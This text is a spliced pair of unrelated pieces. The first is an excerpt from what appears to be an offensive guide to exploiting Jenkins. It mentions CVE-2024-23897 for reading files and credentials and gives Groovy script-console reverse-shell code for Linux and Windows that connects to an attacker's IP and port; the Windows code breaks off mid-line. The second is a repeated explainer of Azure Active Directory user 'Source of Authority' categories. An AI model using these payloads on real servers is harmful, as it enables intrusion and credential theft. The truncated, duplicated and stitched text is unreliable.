Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Source of Authority (SoA) describes where the user is primarily defined. This can be classified in to four categories. A user can be defined in,
1) Azure Active Directory
This is a native cloud user account also known a member.
2) External Azure Active Directory
Invited user from another azure tenant. If you invite a user from another tenant to your tenant, the user's SoA will be External Azure Active Directory.
3) Microsoft Account
A person who creates the subscription (Subscription owner) with a Microsoft account (live, hotmail etc) will have the SoA of Microsoft Account.
4) Local Active Directory
Synchronized user accounts with an on-premises Active directory will have the SoA of Local Active Directory.
1) Azure Active Directory
This is a native cloud user account also known a member.
2) External Azure Active Directory
Invited user from another azure tenant. If you invite a user from another tenant to your tenant, the user's SoA will be External Azure Active Directory.
3) Microsoft Account
A person who creates the subscription (Subscription owner) with a Microsoft account (live, hotmail etc) will have the SoA of Microsoft Account.
4) Local Active Directory
Synchronized user accounts with an on-premises Active directory will have the SoA of Local Active Directory.